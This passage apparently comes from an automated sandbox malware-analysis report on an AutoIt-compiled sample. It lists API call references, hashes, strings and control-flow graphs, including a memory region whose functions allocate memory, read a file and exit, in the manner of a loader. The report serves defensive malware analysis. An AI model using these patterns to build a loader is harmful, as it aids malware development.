                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                            • Instruction ID: eda1fa873b5499b9b23fc4e189178c1c78c4b8ac3e8e957acf8050c0a9e8ad68
                                                            • Opcode Fuzzy Hash: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                            • Instruction Fuzzy Hash: C8E0D8324149046752106B3CEC0D4FE779DEE05335F108715F935D11D0EB78590095D9
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0A5B
                                                            • timeGetTime.WINMM ref: 006A0D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0E53
                                                            • Sleep.KERNEL32(0000000A), ref: 006A0E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 006A0EFA
                                                            • DestroyWindow.USER32 ref: 006A0F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006A0F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 006D4E83
                                                            • TranslateMessage.USER32(?), ref: 006D5C60
                                                            • DispatchMessageW.USER32(?), ref: 006D5C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006D5C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbu$pbu$pbu$pbu
                                                            • API String ID: 4212290369-2982233261
                                                            • Opcode ID: cb3d1331c9cc01f028af5589d2e4a5f475e165da3ce965067b7d1d59ccaa0bc0
                                                            • Instruction ID: 78579c9bac579aa5e243ab4b440e0e927fad10775712c8ec3ffc75c86059a65c
                                                            • Opcode Fuzzy Hash: cb3d1331c9cc01f028af5589d2e4a5f475e165da3ce965067b7d1d59ccaa0bc0
                                                            • Instruction Fuzzy Hash: BAB2E270A08741DFEB24DF24C884BAAB7E6BF85304F14891EE44A977A1CB75EC45CB46

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 006F8F5F: __time64.LIBCMT ref: 006F8F69
                                                              • Part of subcall function 00694EE5: _fseek.LIBCMT ref: 00694EFD
                                                            • __wsplitpath.LIBCMT ref: 006F9234
                                                              • Part of subcall function 006B40FB: __wsplitpath_helper.LIBCMT ref: 006B413B
                                                            • _wcscpy.LIBCMT ref: 006F9247
                                                            • _wcscat.LIBCMT ref: 006F925A
                                                            • __wsplitpath.LIBCMT ref: 006F927F
                                                            • _wcscat.LIBCMT ref: 006F9295
                                                            • _wcscat.LIBCMT ref: 006F92A8
                                                              • Part of subcall function 006F8FA5: _memmove.LIBCMT ref: 006F8FDE
                                                              • Part of subcall function 006F8FA5: _memmove.LIBCMT ref: 006F8FED
                                                            • _wcscmp.LIBCMT ref: 006F91EF
                                                              • Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9824
                                                              • Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F9452
                                                            • _wcsncpy.LIBCMT ref: 006F94C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 006F94FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F9511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F9522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F9534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: cd7d9365a10497b90e26971dd4d2510a4981b877315d328b22195e8ee29163db
                                                            • Instruction ID: 914c01c2ecef9600c7b595da7c7ebdd2bb31c4ed84bf33fa6da96f19f54a72c3
                                                            • Opcode Fuzzy Hash: cd7d9365a10497b90e26971dd4d2510a4981b877315d328b22195e8ee29163db
                                                            • Instruction Fuzzy Hash: 99C12CB1D0021DAADF61DF95CC85EEEB7BEEF85310F0040AAF609E6151DB309A858F65

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                            • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                            • LoadIconW.USER32(000000A9), ref: 006930F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 084b4eba7ab75e4657733079cb2d9a97059d2930cb719578c6e3d3e9e827f74c
                                                            • Instruction ID: 0816c747a8bbb78398a526b5a371422719e8952a91136cafd4beebd8e33baf3f
                                                            • Opcode Fuzzy Hash: 084b4eba7ab75e4657733079cb2d9a97059d2930cb719578c6e3d3e9e827f74c
                                                            • Instruction Fuzzy Hash: 4C3148B1805348AFDB00CFA8D889AD9BFF4FB09310F14816EE580E62A0D3B91545CF95

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                            • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                            • LoadIconW.USER32(000000A9), ref: 006930F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 535eec30bd082c4000b5b305719254597c408ff77c8ed031e2c33561965d229c
                                                            • Instruction ID: 23fd8a2e533820b4591dfd0d9ca48f339080642cc7c0003c9b86ece16a4552af
                                                            • Opcode Fuzzy Hash: 535eec30bd082c4000b5b305719254597c408ff77c8ed031e2c33561965d229c
                                                            • Instruction Fuzzy Hash: 6A21B2B1911718AFDB00DFA8EC89BDDBBF4FB08711F10C12AF914A62A0D7B955448F99

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00694706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007552F8,?,006937AE,?), ref: 00694724
                                                              • Part of subcall function 006B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00697165), ref: 006B052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006971A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006CE8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006CE909
                                                            • RegCloseKey.ADVAPI32(?), ref: 006CE947
                                                            • _wcscat.LIBCMT ref: 006CE9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: c987306084b6871dc145bf412555fbed9c2f309c5f523334c0bd381b9af65820
                                                            • Instruction ID: 8a43da4c5063d63a72a36e7ffa290ed1abd1cbd3780dff516341c4bec6c24c62
                                                            • Opcode Fuzzy Hash: c987306084b6871dc145bf412555fbed9c2f309c5f523334c0bd381b9af65820
                                                            • Instruction Fuzzy Hash: D7717D715083019ED744EF29E8419EBBBF9FF88310F80852EF445872A1EBB5D949CB5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 760 693633-693681 762 6936e1-6936e3 760->762 763 693683-693686 760->763 762->763 766 6936e5 762->766 764 693688-69368f 763->764 765 6936e7 763->765 767 69374b-693753 PostQuitMessage 764->767 768 693695-69369a 764->768 770 6cd0cc-6cd0fa call 6a1070 call 6a1093 765->770 771 6936ed-6936f0 765->771 769 6936ca-6936d2 DefWindowProcW 766->769 777 693711-693713 767->777 775 6cd154-6cd168 call 6f2527 768->775 776 6936a0-6936a2 768->776 778 6936d8-6936de 769->778 806 6cd0ff-6cd106 770->806 772 6936f2-6936f3 771->772 773 693715-69373c SetTimer RegisterWindowMessageW 771->773 779 6936f9-69370c KillTimer call 69443a call 693114 772->779 780 6cd06f-6cd072 772->780 773->777 782 69373e-693749 CreatePopupMenu 773->782 775->777 799 6cd16e 775->799 783 6936a8-6936ad 776->783 784 693755-69375f call 6944a0 776->784 777->778 779->777 792 6cd0a8-6cd0c7 MoveWindow 780->792 793 6cd074-6cd076 780->793 782->777 788 6cd139-6cd140 783->788 789 6936b3-6936b8 783->789 800 693764 784->800 788->769 795 6cd146-6cd14f call 6e7c36 788->795 797 6936be-6936c4 789->797 798 6cd124-6cd134 call 6f2d36 789->798 792->777 801 6cd078-6cd07b 793->801 802 6cd097-6cd0a3 SetFocus 793->802 795->769 797->769 797->806 798->777 799->769 800->777 801->797 807 6cd081-6cd092 call 6a1070 801->807 802->777 806->769 811 6cd10c-6cd11f call 69443a call 69434a 806->811 807->777 811->769
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 006936D2
                                                            • KillTimer.USER32(?,00000001), ref: 006936FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0069371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0069372A
                                                            • CreatePopupMenu.USER32 ref: 0069373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0069374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%r
                                                            • API String ID: 129472671-4130811174
                                                            • Opcode ID: ca467d148297beb9163ad623a7797b74d33161721a171fff5d8be7a6fdb0102f
                                                            • Instruction ID: 90c544d38ccb4d169c9bf3a9f5cf1feab2010c9772cda4b1d7e07691aec055fb
                                                            • Opcode Fuzzy Hash: ca467d148297beb9163ad623a7797b74d33161721a171fff5d8be7a6fdb0102f
                                                            • Instruction Fuzzy Hash: B24149B1200615BBDF106FA8DC29BF9379FEB01301F504139F5029A7E1CAA9AE05976E

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00693A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00693A5F
                                                            • LoadIconW.USER32(00000063), ref: 00693A76
                                                            • LoadIconW.USER32(000000A4), ref: 00693A88
                                                            • LoadIconW.USER32(000000A2), ref: 00693A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AC0
                                                            • RegisterClassExW.USER32(?), ref: 00693B16
                                                              • Part of subcall function 00693041: GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                              • Part of subcall function 00693041: RegisterClassExW.USER32(00000030), ref: 0069309E
                                                              • Part of subcall function 00693041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                              • Part of subcall function 00693041: InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                              • Part of subcall function 00693041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                              • Part of subcall function 00693041: LoadIconW.USER32(000000A9), ref: 006930F2
                                                              • Part of subcall function 00693041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: da77127f1df0ceb8a460cdf90dd0f31d1ad4477cb6ca0a2109ef8fbcb97aba66
                                                            • Instruction ID: 6144afd0c058d2e43927a4042daa50f3829cd70b6520b7c4e906f8d78ebcc792
                                                            • Opcode Fuzzy Hash: da77127f1df0ceb8a460cdf90dd0f31d1ad4477cb6ca0a2109ef8fbcb97aba66
                                                            • Instruction Fuzzy Hash: 292119B1D10708AFEF10DFA8EC59BDD7BB5FB08712F10812AE504A62E1D7B956508F98

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Ru
                                                            • API String ID: 1825951767-3048454719
                                                            • Opcode ID: b7a157617d69456690c4a4deda069c03083870d053e61dc82edf8f6a736bb384
                                                            • Instruction ID: f11b16dd4c44c4bebeb8dfb7d89a31cdb2a5467380d84247156c6f8c0cb0d905
                                                            • Opcode Fuzzy Hash: b7a157617d69456690c4a4deda069c03083870d053e61dc82edf8f6a736bb384
                                                            • Instruction Fuzzy Hash: E1A16CB191022D9ADF44EBA4DC91EFEB77EBF15300F04042EE416A7691EF745A09CB64

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B0193
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 006B019B
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B01A6
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B01B1
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006B01B9
                                                              • Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006B01C1
                                                              • Part of subcall function 006A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0069F930), ref: 006A6154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0069F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0069FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 006D45C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <Wu$\Tu$%r$R
                                                            • API String ID: 1986988660-1577227448
                                                            • Opcode ID: 3388dc1e8fc8a1b75a8369daf9a55338dafbb7008f3e511a058f60e2bab3044b
                                                            • Instruction ID: f7de86ec5d2b95b454b170ce7106caaec4c5387bee201342d655d67b6c041def
                                                            • Opcode Fuzzy Hash: 3388dc1e8fc8a1b75a8369daf9a55338dafbb7008f3e511a058f60e2bab3044b
                                                            • Instruction Fuzzy Hash: CE81BBB0911B80CF8784DF29A8616A87BE6FB98307790C53ED419CB271EBFC54858F59

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 983 d53210-d532be call d50c20 986 d532c5-d532eb call d54120 CreateFileW 983->986 989 d532f2-d53302 986->989 990 d532ed 986->990 995 d53304 989->995 996 d53309-d53323 VirtualAlloc 989->996 991 d5343d-d53441 990->991 993 d53483-d53486 991->993 994 d53443-d53447 991->994 997 d53489-d53490 993->997 998 d53453-d53457 994->998 999 d53449-d5344c 994->999 995->991 1002 d53325 996->1002 1003 d5332a-d53341 ReadFile 996->1003 1004 d534e5-d534fa 997->1004 1005 d53492-d5349d 997->1005 1000 d53467-d5346b 998->1000 1001 d53459-d53463 998->1001 999->998 1008 d5346d-d53477 1000->1008 1009 d5347b 1000->1009 1001->1000 1002->991 1010 d53343 1003->1010 1011 d53348-d53388 VirtualAlloc 1003->1011 1006 d534fc-d53507 VirtualFree 1004->1006 1007 d5350a-d53512 1004->1007 1012 d534a1-d534ad 1005->1012 1013 d5349f 1005->1013 1006->1007 1008->1009 1009->993 1010->991 1014 d5338f-d533aa call d54370 1011->1014 1015 d5338a 1011->1015 1016 d534c1-d534cd 1012->1016 1017 d534af-d534bf 1012->1017 1013->1004 1023 d533b5-d533bf 1014->1023 1015->991 1020 d534cf-d534d8 1016->1020 1021 d534da-d534e0 1016->1021 1019 d534e3 1017->1019 1019->997 1020->1019 1021->1019 1024 d533c1-d533f0 call d54370 1023->1024 1025 d533f2-d53406 call d54180 1023->1025 1024->1023 1031 d53408 1025->1031 1032 d5340a-d5340e 1025->1032 1031->991 1033 d53410-d53414 CloseHandle 1032->1033 1034 d5341a-d5341e 1032->1034 1033->1034 1035 d53420-d5342b VirtualFree 1034->1035 1036 d5342e-d53437 1034->1036 1035->1036 1036->986 1036->991
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D532E1
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D53507
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction ID: 944e65d23163f3a52efa144edfdd92cdeb4b8ef2ab16a1c7a7d449e69dcb3472
                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction Fuzzy Hash: 06A10774E00209EBDF14CFA4C894BEEBBB5FF48305F248159E901BB280D7759A85DBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1114 6939d5-693a45 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00693A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00693A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: f276a91f692d7c310fefe5913e61a41594d7ff068c6ef8cd6371ce4d6d4a3a0b
                                                            • Instruction ID: a3efd29a659e2d9e3293b76a4f8fda79f463053c104f4a59d654d2f73cf332ac
                                                            • Opcode Fuzzy Hash: f276a91f692d7c310fefe5913e61a41594d7ff068c6ef8cd6371ce4d6d4a3a0b
                                                            • Instruction Fuzzy Hash: 32F030B05407907EEB315717AC18EA72E7DE7C6F61F008029F904A21B0C5E91840CB78

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1467 d52fd0-d53112 call d50c20 call d52ec0 CreateFileW 1474 d53114 1467->1474 1475 d53119-d53129 1467->1475 1476 d531c9-d531ce 1474->1476 1478 d53130-d5314a VirtualAlloc 1475->1478 1479 d5312b 1475->1479 1480 d5314c 1478->1480 1481 d5314e-d53165 ReadFile 1478->1481 1479->1476 1480->1476 1482 d53167 1481->1482 1483 d53169-d531a3 call d52f00 call d51ec0 1481->1483 1482->1476 1488 d531a5-d531ba call d52f50 1483->1488 1489 d531bf-d531c7 ExitProcess 1483->1489 1488->1489 1489->1476
                                                            APIs
                                                              • Part of subcall function 00D52EC0: Sleep.KERNELBASE(000001F4), ref: 00D52ED1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D53108
                                                            Strings
                                                            Memory Dump Source
